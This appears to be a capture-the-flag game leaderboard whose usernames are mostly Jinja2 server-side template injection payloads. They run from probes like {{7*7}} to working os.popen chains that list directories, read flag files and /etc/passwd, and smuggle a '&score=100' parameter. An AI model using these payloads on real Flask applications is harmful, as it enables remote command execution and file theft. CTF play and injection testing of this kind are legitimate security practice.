Hall of fame
Global Leaderboard
| # | Username | Score |
|---|---|---|
| 1 | SnakeGod | 9999 |
| 2 | NullPtrExc | 310 |
| 3 | 0xDEADBEEF | 280 |
| 4 | glibc_enjoyr | 195 |
| 5 | TEST{{7*7}} | 100 |
| 6 | {{config}} | 100 |
| 7 | {{lipsum.__globals__['os'].popen('ls -la /flag*').read()}} | 100 |
| 8 | {{cycler.__init__.__globals__.os.popen('ls -la /').read()}} | 100 |
| 9 | {{joiner.__init__.__globals__.os.popen('ls -la /tmp').read()}} | 100 |
| 10 | {{namespace.__init__.__globals__.os.popen('ls -la').read()}} | 100 |
| 11 | {{url_for.__globals__['os'].popen('ls -la').read()}} | 100 |
| 12 | {{config.__class__.__init__.__globals__['os'].popen('ls -la /app').read()}} | 100 |
| 13 | {{config.__class__.__init__.__globals__['os'].popen('ls -la /').read()}} | 100 |
| 14 | {{lipsum.__globals__['os'].popen('ls -la /flag*').read()}} | 100 |
| 15 | {{lipsum.__globals__['os'].popen('cat /flag.txt').read()}} | 100 |
| 16 | {{lipsum.__globals__['os'].popen('cat /flag.txt').read()}} | 100 |
| 17 | testuser | 100 |
| 18 | {{7*7}} | 100 |
| 19 | {{config}} | 100 |
| 20 | {{2 3}} | 100 |
| 21 | {{get_flashed_messages.__globals__.__builtins__.open('/flag').read()}} | 100 |
| 22 | {{''.__class__.__mro__[1].__subclasses__()}} | 100 |
| 23 | {{cycler.__init__.__globals__.os.popen('cat /flag.txt').read()}} | 100 |
| 24 | {{cycler.__init__.__globals__.os.popen('cat /app/flag').read()}} | 100 |
| 25 | {{cycler.__init__.__globals__.os.popen('cat /app/flag.txt').read()}} | 100 |
| 26 | {{cycler.__init__.__globals__.os.popen('cat /app/templates/flag').read()}} | 100 |
| 27 | {{cycler.__init__.__globals__.os.popen('cat /home/flag').read()}} | 100 |
| 28 | {{cycler.__init__.__globals__.os.popen('cat /tmp/flag').read()}} | 100 |
| 29 | {{cycler.__init__.__globals__.os.popen('cat /root/flag').read()}} | 100 |
| 30 | {{(lipsum.__globals__['os'].popen('ls /app').read())}} | 100 |
| 31 | {{''.__class__.__mro__[1].__subclasses__()[X](['cat','/etc/passwd'],stdout=-1).communicate()[0]}} | 100 |
| 32 | {{lipsum.__globals__.os.popen('ls').read()}} | 100 |
| 33 | {{config}} | 100 |
| 34 | {{url_for.__globals__}} | 100 |
| 35 | test123 | 100 |
| 36 | {{7*'7'}} | 100 |
| 37 | {{7*7}} | 0 |
| 38 | {{ ''.__class__.__mro__.__subclasses__().__init__.__globals__['popen']('ls').read() }} | 0 |
| 39 | {{config}} | 0 |
| 40 | {{self}} | 0 |
| 41 | {{ ''.__class__.__mro__ }} | 0 |
| 42 | {{ ''.__class__.__mro__ }} | 0 |
| 43 | {{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }} | 0 |
| 44 | {{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls -la').read() }} | 0 |
| 45 | {{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read() }} | 0 |
| 46 | {{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}&score=100 | 0 |
| 47 | {{request}}&score=100 | 0 |
| 48 | {{lipsum.__globals__.os.popen('id').read()}}&score=100 | 0 |
| 49 | template_fan | -40 |